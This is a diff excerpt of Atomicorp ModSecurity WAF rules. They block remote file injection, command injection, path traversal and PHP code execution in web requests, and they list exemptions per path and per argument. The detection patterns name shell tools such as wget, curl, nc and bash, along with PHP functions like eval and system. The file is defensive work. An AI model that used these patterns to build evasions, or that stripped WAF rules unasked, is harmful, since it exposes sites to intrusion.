+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:u|!ARGS:cof|!ARGS:ureferrer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340741,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91333
+
+SecRule REQUEST_FILENAME "/fla_video\.swf" "phase:2,id:91334,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/admin/admin_board\.php" "phase:2,id:91335,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91336,t:none,pass,nolog,skipAfter:END_RULES_91336"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:sql|!ARGS:address_whois "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340742,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:sql|!ARGS:address_whois "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340743,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91336
+
+SecRule REQUEST_FILENAME "/search_results\.php" "phase:2,id:91337,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91338,t:none,pass,nolog,skipAfter:END_RULES_91338"
+
+SecRule ARGS|!ARGS:server_protocol|!ARGS:databasehost|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:act "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:341744,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:server_protocol|!ARGS:databasehost|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:act "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341745,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91338
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/wordtube/lib/statistic\.php" "phase:2,id:91339,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91340,t:none,pass,nolog,skipAfter:END_RULES_91340"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340746,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340747,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91340
+
+SecRule REQUEST_FILENAME "/paadmin/categories\.php" "phase:2,id:91341,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380011"
+
+SecRule REQUEST_FILENAME "/alt_clickmenu\.php" "phase:2,id:91342,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/get\.php" "phase:2,id:91343,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/admin-ajax\.php" "phase:2,id:91344,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=390703,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340213,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340158,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=340018,ctl:ruleRemovebyID=390708,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+SecAction "phase:2,id:91345,t:none,pass,nolog,skipAfter:END_RULES_91345"
+
+
+
+# Rule 340029: script, perl, etc. code
+SecRule REQUEST_URI|ARGS|!ARGS:/thumbnail/|!ARGS:image|!ARGS:screenshot_png|!ARGS:/^acf/|!ARGS:fileContent|!ARGS:/_edit_/|!ARGS:/details/|!ARGS:/block_value/|!ARGS:/News/|!ARGS:/products_/|!ARGS:/article/|!ARGS:/template/|!ARGS:editor1|!ARGS:prefix|!ARGS:suffix|!ARGS:/info/|!ARGS:payment_extrainfo|!ARGS:file|!ARGS:thecode|!ARGS:/chat/|!ARGS:snippet|!ARGS:/phpcode/|!ARGS:intro|!ARGS:/title/|!ARGS:/data_parent/|!ARGS:code|!ARGS:lajmi|!ARGS:/content/|!ARGS:/desc/|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:/content/|!ARGS:/keyword/|!ARGS:/summary/|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/subject/|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/|!ARGS:ibsf|!ARGS:/disallowed/ "(?:;|/|\| )(?:\b(?:cat|ls|perl|uname|pwd|cp|tclsh8?|cpp|f(?:etch|tp)|python|chown|rm|ping|rsync|rdiff-backup|scp|(?:w|ftp)get|curl|links|g\+\+|ch(?:grp|own)|passwd|r?(?:b|d)ash|t?c?sh|telnet|clang|nc)\b |\b(?:sleep|benchmark)\b \(? ?[0-9]|powershell -w|\bkill(?: (?:[0-9]|-)|all\ ))" 	"log,auditlog,phase:2,deny,log,status:403,capture,id:360029,t:none,t:utf8toUnicode,t:urlDecodeUni,t:replaceNulls,t:cmdLine,rev:38,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked - command in REQUEST_URI or Argument',logdata:'%{TX.0}'"
+
+
+# Rule 340006: generic recursion signatures
+SecRule REQUEST_FILENAME|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|ARGS|!ARGS:Answer|!ARGS:site_details|!ARGS:/ultra_/|!ARGS:/icon/|!ARGS:Inhalt|!ARGS:/fields_prev/|!ARGS:Details|!ARGS:Lead|!ARGS:changes|!ARGS:/editfile/|!ARGS:thecode|!ARGS:/sourcedir/|!ARGS:elm1|!ARGS:/EditorZone/|!ARGS:file_private_path|!ARGS:/form_data/|!ARGS:code|!ARGS:/^wpm_o_plugin/|!ARGS:/^jform/|!ARGS:/^resp/|!ARGS:rpath|!ARGS:data|!ARGS:/template/|!ARGS:/content/|!ARGS:/sidebar/|!ARGS:editor1|!ARGS:resolution|!ARGS:/logo/|!ARGS:/^style_options/|!ARGS:manager_image_path|!ARGS:prefix|!ARGS:suffix|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:/desc/|!ARGS:videoplayer|!ARGS:css_data|!ARGS:/txt/|!ARGS:/body/|!ARGS:wysiwyg_input|!ARGS:backPath|!ARGS:/text/|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:trk|!ARGS:advHTMLEdit1|!ARGS:modules "\.\./\.\./"  	"deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdline,capture,id:347006,phase:2,rev:69,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}'"
+
+SecRule REQUEST_URI|ARGS|!ARGS:site_details|!ARGS:content|!ARGS:res|!ARGS:/autosave/|!ARGS:/css/|!ARGS:/^widget-my_requestquotewidget/|!ARGS:/wp_autosave/|!ARGS:po|!ARGS:modules "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))" 	"deny,status:403,phase:2,log,auditlog,t:none,t:lowercase,id:340748,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"
+
+SecMarker END_RULES_91345
+
+SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:91346,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390620,ctl:ruleRemovebyID=340077,ctl:ruleRemovebyID=380011,ctl:ruleRemovebyID=380012,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
+SecAction "phase:2,id:91347,t:none,pass,nolog,skipAfter:END_RULES_91347"
+
+SecRule REQUEST_URI|ARGS|XML:/*|!ARGS:templatecode|!ARGS:areas "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,capture,chain,id:342128,rev:21,severity:2,msg:'Atomicorp.com WAF Rules: Remote PHP command exection',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/code/|!ARGS:areas|!ARGS:file|!ARGS:/script/|!ARGS:description|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:solution|!ARGS:problem|!ARGS:view|!ARGS:/^body/|!ARGS:payment_extrainfo|!ARGS:server_validation|!ARGS:solution|!ARGS:/suffix/|!ARGS:/prefix/|!ARGS:resolution|!ARGS:message|!ARGS:/template/|!ARGS:msg|!ARGS:/php/|!ARGS:gen_header|!ARGS:/layout/|!ARGS:post|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:footerfile|!ARGS:/descr/|!ARGS:titleMetatags|!ARGS:/content/|!ARGS:/^eip_/|!ARGS:/jform/ "(?:(?:chr|fwrite|fopen|system|echr|passthru|serialize|include|php_uname|popen|proc_open|shell_exec|mysql_query|eval|create_function|str_rot13|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg_\w+|base64_decode|base64_url_decode|decode_base64) ?(?:\(|\: ?'?)|system\( ?getenv ?\( ?http_php|(?:fputs|fread) ?\(|chr ?\(.{1,255}\).chr ?\(.{1,255}\).chr\()"  "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase"
+
+SecRule REQUEST_URI "!(^/administrator/index\.php\?option=com_(?:ganalytics|install|config&tmpl|easyblog|form2content))" 	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,id:336142,rev:13,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{MATCHED_VAR}',chain"
+SecRule REQUEST_URI|ARGS|!ARGS:state|!ARGS:ix0|!ARGS:/source_code/|!ARGS:/location/|!ARGS:/coupon/|!ARGS:alias|!ARGS:forSale_path|!ARGS:login|!ARGS:/^m2u/|!ARGS:misc|!ARGS:gallerylist|!ARGS:pathubr_upload|!ARGS:custom_email|!ARGS:extra_info|!ARGS:/source_code/|!ARGS:junkWords|!ARGS:name_ip|!ARGS:marker|!ARGS:marker_select|!ARGS:conf_DOWNLOADROOT|!ARGS:/custom_field/|!ARGS:search_all|!ARGS:/^zcck/|!ARGS:/^tzfields/|!ARGS:contact_info|!ARGS:log_path|!ARGS:tmp_path|!ARGS:pathadmin|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:/video/|!ARGS:/biography/|!ARGS:/sermon/|!ARGS:notes|!ARGS:competitor|!ARGS:/^currentValue/|!ARGS:protocol_select|!ARGS:/constant_contact/|!ARGS:/^plugin/|!ARGS:/^params/|!ARGS:extern_file|!ARGS:rel_path|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:back|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:textfetch|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:/photo/|!ARGS:/media/|!ARGS:/icon/|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/linkedin/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:parent_name|!ARGS:/blog/|!ARGS:/vid/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:importremote|!ARGS:/callback/|!ARGS:/sponsors/|!ARGS:/^akID/|!ARGS:service|!ARGS:want2Read|!ARGS:search_string|!ARGS:/preview/|!ARGS:/thumb/|!ARGS:subject|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:catalogue_search_code|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:Stream|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:/^V_feed/|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:/hostname/|!ARGS:/http/|!ARGS:email_forward|!ARGS:bannercode|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:Stream|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:faqText|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:sm_b_style|!ARGS:success|!ARGS:short_story|!ARGS:/^css/|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:agendWebPage|!ARGS:/ftp/|!ARGS:gen_header|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:basehref|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:goto|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:wysiwyg|!ARGS:banner|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "t:none,t:urlDecodeUni,t:lowercase,multimatch,chain"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecRule REQUEST_URI "!(^/administrator/index\.php\?option=com_(?:ganalytics|install|config|easyblog|form2content))"          "phase:2,deny,log,auditlog,status:403,capture,id:336141,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,rev:13,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{MATCHED_VAR}'"
+SecRule ARGS|!ARGS:misc|!ARGS:ix0|!ARGS:state|!ARGS:/source_code/|!ARGS:alias|!ARGS:/coupon/|!ARGS:/location/|!ARGS:forSale_path|!ARGS:login|!ARGS:/^m2u/|!ARGS:pathubr_upload|!ARGS:gallerylist|!ARGS:junkWords|!ARGS:extra_info|!ARGS:custom_email|!ARGS:name_ip|!ARGS:/source_code/|!ARGS:search_all|!ARGS:/stream/|!ARGS:marker|!ARGS:marker_select|!ARGS:conf_DOWNLOADROOT|!ARGS:/custom_field/|!ARGS:/^zcck/|!ARGS:log_path|!ARGS:/^tzfields/|!ARGS:contact_info|!ARGS:tmp_path|!ARGS:pathadmin|!ARGS:canonical|!ARGS:/addy/|!ARGS:/sermon/|!ARGS:/video/|!ARGS:/biography/|!ARGS:notes|!ARGS:competitor|!ARGS:/^currentValue/|!ARGS:protocol_select|!ARGS:/constant_contact/|!ARGS:/^plugin/|!ARGS:/^params/|!ARGS:extern_file|!ARGS:rel_path|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:back|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|